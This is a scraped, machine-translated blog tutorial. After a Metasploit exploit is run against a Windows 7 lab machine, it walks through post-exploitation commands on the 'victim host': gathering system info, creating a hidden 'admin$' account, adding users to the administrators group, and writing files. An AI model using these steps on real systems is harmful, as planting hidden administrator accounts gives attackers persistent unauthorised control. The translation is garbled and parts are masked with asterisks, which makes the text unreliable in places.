当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
2020-11-06 01:35:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. It's a success Win7 One virtual machine
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 Yes, it's taken down Windows After the host enters *** Stage , The specific operation is shown in the figure below .
step 1: Run the exploit module , As shown in the figure below .
command :run
step 2: Get into Windows The host cmd window , As shown in the figure below .
step 3: Use the command to view the system information of the victim host , Know yourself and know your enemy, and have a more comprehensive grasp of the target victim host , More comprehensive control of the target host , Get more comprehensive information , As shown in the figure below .
command :systeminfo
step 4: The system information of the victim host is shown in the figure below .
3.2 User management operation on the victim host , As shown in the figure below .
step 1: Add hidden user information to the victim host , As shown in the figure below .
command :net user A new user name $ User password /add
Example :net user admin$ 12456 /add
step 2: Check out the new users you just added , As shown in the figure below .
command :net user( Because the new user is a hidden user , So the command line can't see the user )
step 3: Add new users that are not hidden , As shown in the figure below .
command :net user A new user name User password /add
Example :net user admin 12456 /add
step 4: Check out the new users you just added , As shown in the figure below .
command :net user
step 5: Use the graphical interface in the victim host to view the newly created user , You can see the new hidden user in this interface ( If you need to achieve the real sense of hidden users, you need to change the registry , Please keep an eye on the follow-up of this issue )
step 6: Delete user , As shown in the figure below .
command :net user user name /del
Example :net user admin /del
step 7: Add the new user to the administrators group , As shown in the figure below .
command :net localgroup administrators /add
step 8: View the users of the administrators group , As shown in the figure below .
command :net localgroup administrators
3.3 File operation on the victim host , As shown in the figure below .
step 1: New folder
command :md file name
Example :md abc
step 2: Delete folder
command :rd file name
Example :rd abc
step 3: New text file , As shown in the figure below .
command :echo Text file content > file name
Example :echo hi you are hacked > hk.txt
3.4 Check the host name of the victim host , As shown in the figure below .
command :hostname
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills ! Please add a link description
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- 新建一个空文件占用多少磁盘空间?
- The choice of enterprise database is usually decided by the system architect - the newstack
- It's easy to operate. ThreadLocal can also be used as a cache
- Cglib 如何实现多重代理?
- 零基础打造一款属于自己的网页搜索引擎
- Who says cat can't do link tracking? Stand up for me
- [C / C + + 1] clion configuration and running C language
- 一篇文章带你了解CSS3 背景知识
- 6.1.2 handlermapping mapping processor (2) (in-depth analysis of SSM and project practice)
- 教你轻松搞懂vue-codemirror的基本用法:主要实现代码编辑、验证提示、代码格式化
猜你喜欢

零基础打造一款属于自己的网页搜索引擎

Character string and memory operation function in C language

vue-codemirror基本用法:实现搜索功能、代码折叠功能、获取编辑器值及时验证

Unity性能优化整理

I think it is necessary to write a general idempotent component

I'm afraid that the spread sequence calculation of arbitrage strategy is not as simple as you think

Summary of common string algorithms

Word segmentation, naming subject recognition, part of speech and grammatical analysis in natural language processing

NLP model Bert: from introduction to mastery (1)

Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
随机推荐
[C / C + + 1] clion configuration and running C language
How to customize sorting for pandas dataframe
6.3 handlerexceptionresolver exception handling (in-depth analysis of SSM and project practice)
DRF JWT authentication module and self customization
Installing the consult cluster
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
5.4 static resource mapping
Discussion on the technical scheme of text de duplication (1)
Discussion on the development practice of aspnetcore, a cross platform framework
有了这个神器,快速告别垃圾短信邮件
Filecoin主网上线以来Filecoin矿机扇区密封到底是什么意思
Named entity recognition in natural language processing: tanford core LP ner (1)
git rebase的時候捅婁子了,怎麼辦?線上等……
Solve the problem of database insert data garbled in PL / SQL developer
Analysis of ThreadLocal principle
Mac installation hanlp, and win installation and use
Analysis of etcd core mechanism
With the advent of tensorflow 2.0, can pytoch still shake the status of big brother?
Construction of encoder decoder model with keras LSTM
仅用六种字符来完成Hello World,你能做到吗?